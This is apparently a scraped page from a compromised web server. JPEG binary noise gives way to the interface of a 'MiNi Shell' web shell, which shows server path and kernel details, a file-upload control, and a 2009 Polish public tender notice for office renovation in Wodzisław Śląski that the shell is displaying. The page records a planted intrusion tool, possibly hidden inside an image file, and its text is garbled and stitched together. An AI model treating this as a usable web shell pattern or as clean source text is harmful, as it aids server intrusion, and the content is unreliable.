JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/68981-N-2009.html

<p class="kh_header"><b>Wodzisław Śląski: Roboty budowlane w budynku położonym w Wodzisławiu Śl. przy ul. dr L. Mendego 3     w zakresie przystosowania pomieszczeń na biura - etap II</b><br>
<b>Numer ogłoszenia: 68981 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zakład Zarządzania Nieruchomościami , ul. Wyszyńskiego 41, 44-300 Wodzisław Śląski, woj. śląskie, tel. 0-32 4572006, faks 0-32 4572006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatwodzislawski.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w budynku położonym w Wodzisławiu Śl. przy ul. dr L. Mendego 3     w zakresie przystosowania pomieszczeń na biura - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w zakresie przystosowania pomieszczeń na biura  w  budynku przy  ul. dr L. Mendego 3  w Wodzisławiu Śl.
Zakres przedmiotu zamówienia został podzielony na 2 etapy. Zakres robót objęty etapem I   zrealizowany został w I połowie 2009r., natomiast zakres robót objęty etapem II jest następujący: 
I.Branża architektoniczno - budowlana:

1)  Prace wewnątrz budynku  - wewnętrzne roboty demontażowe i wyburzeniowe
1.odbicie tynków wewnętrznych na stropach i ścianach,
2.zeskrobanie i zmycie starej farby na stropach i ścianach .

2)     Prace wewnątrz budynku - roboty montażowe i budowlano-naprawcze
1.osadzenie ościeżnic i skrzydeł  drzwiowych wewnętrznych,
2.montaż drzwi wewnętrznych aluminiowych,
3.montaż systemowych ścianek wraz z drzwiami (wc),
4.montaż sufitów podwieszanych z płyt gipsowo-kartonowych,
5.wykonanie tynków wewnętrznych na ścianach (mieszanka modyfikowana EUROKALMATRONEM przyjmując  proporcję 3 części zwykłej zaprawy piaskowo-cementowej (z worka); 1 część zaprawy EUROKALMATRON (z worka),
6.gruntowanie powierzchni stropów  preparatem gruntującym,
7.wykonanie gładzi mineralnych,
8.licowanie ścian płytkami ceramicznymi ściennymi,
9.wykonanie posadzek z płytek gresowych i wykładziny elastycznej na podbudowie - parter (podsypka piaskowo-żwirowa, beton B10, folia  PE, styropian grubości 10 cm, wylewka cementowa zbrojona siatką fi 3  co 10 cm, płytki na kleju, wykładzina na warstwie wyrównawczej),
10.wykonanie posadzek z płytek gresowych i wykładziny elastycznej - płytki na kleju,wykładzina przemysłowa  - piętro (płytki na kleju,wykładzina),
11.okładziny schodów płytkami gresowymi na kleju,
12.zamontowanie poręczy dla osób niepełnosprawnych w sanitariatach, 
13.dostawa i montaż klimatyzatora,                                
14.montaż przewodów wentylacyjnych, anemostatów i wentylatorów wywiewnych,                              
15.dostawa i montaż luster,                                
16.dostawa i montaż (numerów pomieszczeń, piktogramów, tabliczek szklanych  przydrzwiowych, antyram, osłon dylatacji),    
17. demontaż, transport i montaż istniejących szaf przesuwnych z budynku Starostwa.                            
18.montaż krat okiennych - parter archiwum,                              
19.montaż prowadnic pod szafy.        
        
3)     Prace zewnętrzne na budynku - roboty demontażowo - rozbiórkowe                       
1.rozebranie konstrukcji żelbetowych (gzyms),
2.odbicie tynków zewnętrznych.

4)    Prace zewnętrzne na budynku - roboty montażowe i  budowlano - naprawcze
1.przygotowanie podłoża pod docieplenie poprzez oczyszczenie mechaniczne i zmycie,
2.ocieplenie ścian i ościeży  (styropian -ściany grubości 10cm, ościeża  grubości 3cm, siatka , wyprawa elewacyjna),
3.docieplenie cokołu (styropian grubość 5 cm, siatka, płytki klinkierowe),
4.montaż narożników,
5.zamocowanie listwy cokołowej,
6.malowanie farbami emulsyjnymi elewacji,
7.dostawa i montaż na elewacji liter ze stali chromoniklowej,
8.montaż systemowych daszków na konstrukcji aluminiowej nad wejściami.
9.montaż numeru porządkowego nieruchomości (wg wzoru stosowanego na terenie miasta)
10.rusztowania zewnętrzne rurowe.

II.	Branża: instalacja wod - kan.:

1)	Demontaż rurociągów i urządzeń,
1.demontaż instalacji wodociągowej i kanalizacyjnej,
2.demontaż urządzeń (umywalki, zlewozmywak itp..)

2)     Instalacja wody zimnej i ciepłej, 
1.ułożenie rur wielowarstwowych PEX-AL.-PEX,
2.wykonanie podejść dopływowych,
3.montaż baterii umywalkowych i zlewozmywakowych,
4.montaż wodomierzy z wykonaniem podejść,
5.montaż podgrzewaczy podumywalkowych, elektrycznych przypływowy 3,5 kW,
6.montaż zaworu antyskażeniowego EA 251 dn 40mm,
7.montaż zaworów antyskażeniowych HA dn 15 mm,
8.wykonanie próby szczelności instalacji wodociągowej.

3)     Instalacja kanalizacji sanitarnej, 
1.ułożenie rur kanalizacyjnych z PCV,
2.wykonanie podejść odpływowych,
3.montaż rur wywiewnych,
4. montaż wpustów ściekowych z tworzyw sztucznych,
5.montaż czyszczaków z tworzyw sztucznych,
6.montaż umywalek, zlewozmywaków i półpostumentów  do  umywalek,
7. montaż ustępów  - wc kompakt WABI IN 6100 oraz umywalek z bateriami dla osób 
niepełnosprawnych
8.montaż urządzeń sanitarnych typu kompakt.

4)    Roboty budowlane-izolacyjne, 
1. wykonanie izolacji rur otulinami Thermaflex.

5)   Roboty remontowe budowlane, 
1.wykucie bruzd poziomych i pionowych w ścianach z cegły,
2.przebicie otworów w ścianach,
3.zabetonowanie bruzd w stropach i ścianach,
4.wywiezienie gruzu wraz z utylizacją,

6)   Przyłącze kanalizacji sanitarnej, 
1.wykonanie wykopów pod rury  kanalizacyjne z PCV,
2.ułożenie rur kanalizacyjnych z PCV o średnicy 160 mm z wykonaniem podsypki i obsypki,
3.montaż studzienki systemowej o średnicy 600 mm,
4.wykonanie próby szczelności kanalizacji sanitarnej,
5.wywóz nadmiaru ziemi z wykopów.

7)  Przyłącze kanalizacji deszczowej., 
1.rozebranie nawierzchni z płyt betonowych, Grubość płyt 15 cm,
2.wykonanie wykopów pod rury kanalizacyjne PCV oraz studzienki kanalizacyjne,
3.ułożenie rur kanalizacyjnych z PCV o średnicy 160mm z wykonaniem podsypki i obsypki,
4.montaż studzienek kanalizacyjnych typu WAVIN,
5.montaż podejść odpływowych,
6.montaż czyszczaków GEIGERA z wyjmowanym koszem,
7.wykonanie próby szczelności kanałów rurowych,
8.wywóz nadmiaru ziemi z wykopów.

III.	Branża: instalacja elektryczna

1)	Zakres rzeczowy robót instalacji elektrycznej
1.wykucie bruzdy dla przewodów wtynkowych w cegle
2.ułożenie przewodów niepalnych HDGs3x1,5mm2 w wykonanych bruzdach mocując je za pomocą gipsu
3.ułożenie przewodów YDY2x1,5mm2 w wykonanych bruzdach mocując je za pomocą gipsu
4.ułożenie przewodów YDYżo 3x1,5mm2 w wykonanych bruzdach mocując je za pomocą gipsu
5.ułożenie przewodów YDYżo 3x2,5mm2 w wykonanych bruzdach mocując je za pomocą gipsu
6.ułożenie przewodów YDYżo 3x4mm2 w wykonanych bruzdach mocując je za pomocą gipsu
7.ułożenie przewodów YDYżo 5x1,5mm2 w wykonanych bruzdach mocując je za pomocą gipsu
8.ułożenie przewodów YDYżo 5x10mm2 w wykonanych bruzdach mocując je za pomocą gipsu
9.ułożenie przewodów YDYżo 5x6mm2 w wykonanych bruzdach mocując je za pomocą gipsu
10.ułożenie przewodów YDYżo 5x16mm2 w wykonanych bruzdach mocując je za pomocą gipsu
11.wykonanie przebicia przez ściany o śr.25mm dł. 1 cegła
12.wykonanie przebicia przez ściany o śr.25mm dł. 1,5 cegły
13.wykonanie przebicia przez ściany o śr.25mm dł. 2 cegły
14.wykonanie przebicia przez ściany o śr.60mm dl. 2 cegły
15.przygotowanie w sposób ręczny zaprawy cementowo-wapiennej
16.zaprawienie bruzdy
17.mechanicznie wykucie wnęki pod tablice
18.zabudowanie złącza pomiarowego ZP-2a standard Vattenfall
19.zabudowanie tabl. rozdzielczej 600x600x250
20.zabudowanie tabl. rozdzielczej 600x800x250
21.zabudowanie szafy teletechnicznej BD1
22.zabudowanie szafy telefonicznej
23.zabudowanie szafy światłowodowej
24.ułożenie rur winidurowych o śr. do 28mm na uchwytach na betonie mocowanych za pomocą kołków rozporowych
25.wciągniecie przewodu światłowodowego OM2 12x50-125-900 do rury
26.wciągnięcie przewodu telekomunikacyjnego U-UTP50par. kat.3 do rury
27.przygotowanie podłoża pod osprzęt elektryczny, przy pomocy elektronarzędzi wykonać otwory ślepe w ścianie z cegły
28.zabudowanie puszek inst.60mm pojedynczych w wykonanych otworach na zaprawie gipsowej
29.zabudowanie puszek inst.80mm w wykonanych otworach na zaprawie gipsowej
30.zabudowanie puszek inst.75x75 w wykonanych otworach na zaprawie gipsowej
31.zabudowanie ( przykręcenie) łączników jednobiegunowych p.t
32.zabudowanie ( przykręcenie) łączników świecznikowych p.t
33.zabudowanie ( przykręcenie) łączników schodowych p.t
34.zabudowanie ( przykręcenie) gniazd p.t końcowych ze stykiem ochronnym w puszkach końcowych
35.zabudowanie ( przykręcenie) gniazd p.t podwójnych przelotowych ze stykiem ochronnym w puszkach końcowych
36.zabudowanie ( przykręcenie) gniazd p.t DATA z blokadą kluczem ze stykiem ochronnym w puszkach końcowych
37.zabudowanie ( przykręcenie) gniazd teletechnicznych p.t 2xRJ15 w puszkach końcowych
38.zabudowanie ( przykręcenie) przycisków pożarowych w obudowie
39.zamontowanie listwy PCV z przegrodą za pomocą kołków rozporowych f 8
40.ułożenie przewodów teletechnicznych U-UTP250MHz LSZH kat.6 w korytkach pcv
41.ułożenie przewodów YDYżo 3x4mm2 w korytkach PCV
42.zabudowanie opraw żarowych za pomocą kołków rozporowych f 8
43.zabudowanie opraw świetlówkowych awaryjnych 1x7W EL3h z autotestem układu awaryjnego za pomocą kołków rozporowych f 8
44.zabudowanie opraw świetlówkowych liniowych
45.zabudowanie opraw LED podświetlenia schodów
46.zabudowanie opraw sufitowo-ściennych 230V-50W
47.zabudowanie opraw sufitowo-ściennych 230V-3x50W
48.zabudowanie opraw świetlówkowych TCS160 2x36W w sufity podwieszane
49.zabudowanie opraw świetlówkowych TCS160 3x36W w sufity podwieszane
50.zabudowanie opraw świetlówkowych TCS160 4x18W w sufity podwieszane
51.zabudowanie opraw-kinkietów E27-60W IP44
52.zabudowanie opraw dowlinght FBS120 2x28W w sufity podwieszane
53.zamontowanie wysięgników rurowych ocynkowanych do lamp na ścianie
54.zabudowanie opraw zewnętrznych SGS102-150W na wysięgnikach
55.zabudowanie lampek sygnalizacyjnych, montowanych na szynie TH35
56.zabudowanie wyłączników nadprądowych S301 B6A montowanych na szynie TH35
57.zabudowanie wyłączników nadprądowych S301 B10A montowanych na szynie TH35
58.zabudowanie wyłączników nadprądowych S301 B16A montowanych na szynie TH35
59.zabudowanie wyłączników nadprądowych S301 B20A montowanych na szynie TH35
60.zabudowanie wyłączników nadprądowych S301 C6A montowanych na szynie TH35
61.zabudowanie wyłączników nadprądowych S301 C10A montowanych na szynie TH35
62.zabudowanie wyłączników nadprądowych S303 B6A montowanych na szynie TH35
63.zabudowanie wyłączników różnicowo prądowych 2-bieg. 40A-0,03A montowanych na szynie TH35
64.zabudowanie wyłączników różnicowo prądowych 4-bieg. 40A-0,03A montowanych na szynie TH35
65.zabudowanie rozłączników bezpiecznikowych 3-bieg. R303 63A montowanych na szynie TH35
66.zabudowanie rozłączników bezpiecznikowych 3-bieg. R303 25A montowanych na szynie TH35
67.zabudowanie zegarów sterujących programowalnych 2 kanały montowanych na szynie TH35
68.zabudowanie styczników 2ZZ 40A c.230V montowanych na szynie TH35
69.zabudowanie styczników 4ZZ 40A c.230V montowanych na szynie TH35
70.zabudowanie rozłączników Vistop 3P 100A - sterowanie przód
71.zabudowanie ograniczników przepięciowych klasy B+C
72.zabudowanie szyn nożnych
73.zabudowanie szyn łączeniowych 3-biegunowych
74.sprawdzenie samoczynnego wyłączania za pomocą przyrządu do pomiaru impedancji pętli zwarcia - pierwszy pomiar
75.wykonanie badania i pomiarów instalacji uziemiającej - pierwszy pomiar
76.wykonanie pomiarów natężenia oświetlenia

2)    Zakres rzeczowy robót instalacji piorunochronnej
1.wykopanie rowów dla kabli w sposób mechaniczny o szer.0,4m
2.zamontowanie uziomów powierzchniowych w wykopie
3.zasypanie w sposób mechaniczny rowów kablowych
4.zabudowanie zwodów instalacji odgromowej nienaprężane poziome na wspornikach, drut F8
5.zabudowanie zwodów instalacji odgromowej naprężane pionowe , drut F8
6.połączenie przewodów uziemiających do uziomu
7.wykonanie badania i pomiarów instalacji piorunochronnej - pierwszy pomiar

IV.	Branża: instalacja centralnego ogrzewania

1) Zakres rzeczowy robót instalacji c.o.:
1.demontaż rurociągów stalowych, armatury i grzejników,
2.montaż rurociągów PEX-AL.-PEX ze złączkami zaciskowymi,
3.montaż grzejników stalowych płytowych typu CV,
4.montaż armatury:
  - regulacyjnej: głowic termostatycznych, 
  - odcinającej: zaworów przelotowych, kulowych, zestawów Vekolux, filtra siatkowego,
5.montaż punktów stałych,
6.montaż rozdzielaczy,
7.montaż termometrów i manometrów,
8.izolacja cieplna przewodów otulinami THERMAFLEX,
9.płukanie, próba szczelności i próba na gorąco instalacji z dokonaniem regulacji.

2)  Roboty towarzyszące - roboty remontowe wykończeniowe:
1.przebicia instalacyjne przez ściany i stropy,
2.wykucie bruzd w ścianach i posadzkach,
3.zabetonowanie bruzd,
4.założenie rur ochronnych przy przejściu instalacji przez dylatacje,
5.wywóz i utylizacja gruzu.

Dodatkowe obowiązki  Wykonawcy:
1)opracowanie planu bezpieczeństwa i ochrony zdrowia (BIOZ),
2)zapewnienie nadzoru archeologicznego podczas prac ziemnych, 
3)dokonanie odbiorów budynku pod względem sanitarnym, elektrycznym, przeciwpożarowym, kominiarskim i innymi wynikającymi z właściwych przepisów przez właściwe instytucje,
4)wypełnienia harmonogramu rzeczowo-finansowego, który będzie  załącznikiem do umowy.
Koszty ww. prac pokrywa wykonawca w ramach kosztów ogólnych budowy, bez ich wyodrębnienia  w kosztorysie ofertowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.00.00-6, 45.33.10.00-6, 45.41.00.00-4, 45.42.10.00-4, 45.43.10.00-7, 45.44.21.00-8, 45.45.30.00-7, 45.23.24.00-6, 45.33.00.00-9, 45.45.00.00-6, 45.31.11.00-1, 45.31.23.11-0, 45.33.11.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w przetargu jest wniesienia wadium w wysokości 26.000,00 zł (słownie: dwadzieściasześćtysięcyzłotych 00/100 złotych) w terminie składania ofert, tj. do dn. 21.05.2009 roku  do godz. 10:00. Wadium może być wnoszone w jednej lub kilku formach określonych w art. 45 ust.6 ustawy Pzp. Wadium wniesione w pieniądzu wpłaca  przelewem na rachunek bankowy zamawiającego: 22 1560 1094 0000 9250 0000 2828.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymogi art. 22 ust. 1, pkt 1 - 4  ustawy Pzp, a mianowicie:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
1)	wykażą wykonanie co najmniej 1 (jednej) roboty, w okresie ostatnich pięciu lat przed dniem   wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest   krótszy - w tym okresie, w zakresie remontu budynku wraz z instalacjami i  urządzeniami technicznymi  o wartości co najmniej 1.200000,00zł (brutto), z podaniem jej wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana należycie ( np. referencje, protokoły odbiorów),
(W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, powyższy warunek wykonawcy mogą spełnić łącznie.)
2)	wykażą, że osoby, które będą wykonywały zamówienie posiadają odpowiednie kwalifikacje do wykonania zamówienia; należy wskazać po co najmniej 1 osobie, która będzie pełniła funkcję: 
a)	kierownika budowy, posiadającego uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń,
b)	kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami 
w specjalności  instalacyjnej w zakresie instalacji i urządzeń elektrycznych,
c)	kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami  w specjalności  instalacyjnej w zakresie instalacji sanitarnych, 
d)	kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami w specjalności  instalacyjnej w zakresie instalacji centralnego ogrzewania, 
(W przypadku składania ofert przez wykonawców, ubiegających się wspólnie o udzielenie zamówienia, powyższy warunek wykonawcy mogą spełnić łącznie.)
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,  w oparciu o informacje zawarte w dokumentach, oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż w.w warunki wykonawca spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że wykonawca spełnia warunki udziału w postępowaniu, należy załączyć do oferty - Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1-3 ustawy Pzp - zał. nr 1 do oferty. 
2.	W celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, należy załączyć do oferty - Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust.1 i ust. 2 ustawy Pzp - zał. nr 2 do oferty.
3.	W celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia, wykonawca winien załączyć -Wykaz wykonanych robót budowlanych. W wykazie należy podać nazwę, adres i telefon zamawiającego, opis wykonanych robót wraz z ich zakresem i wartością, termin rozpoczęcia i zakończenia realizacji roboty oraz załączyć dokumenty potwierdzające, że roboty z wykazu zostały wykonane z należytą starannością (np. referencje). Wykonawca winien wykazać, że roboty te były wykonane w ramach jednej umowy każda - zał. nr 3 do oferty. 
4.	W celu potwierdzenia, że wykonawca dysponuje potencjałem technicznym i osobami zdolnymi  do wykonania zamówienia należy załączyć Wykaz osób uczestniczących w wykonywaniu zamówienia - zał. nr 4 do oferty. W wykazie należy podać imię i nazwisko, rolę w realizacji zamówienia oraz posiadane uprawnienia - wymagane dołączenie uprawnień budowlanych kierownika budowy oraz uprawnień budowlanych kierowników robót wraz z aktualnymi zaświadczeniami                        o przynależności do właściwej  Okręgowej Izby Inżynierów Budownictwa w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów oraz urbanistów (Dz. U. z 2001r. Nr 5, poz. 42 z późn. zm.).
W przypadku wskazania osoby, udostępnionej przez inny podmiot, należy dołączyć do oferty pisemne zobowiązanie tego podmiotu do udostępnienia osób zdolnych do wykonania zamówienia.
5.	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania działalności objętej przedmiotem zamówienia należy załączyć do oferty aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

UWAGA: Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez wykonawcę lub osobę (-y) uprawnioną do składania oświadczeń woli w imieniu wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatwodzislawski.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zakład Zarządzania Nieruchomościami
ul. Wyszyńskiego 41
44-300 Wodzisław Śl..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 10:00, miejsce: Powiatowy Zakład Zarządzania Nieruchomościami 
ul. Wyszyńskiego 41
44-300 Wodzisław Śl..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com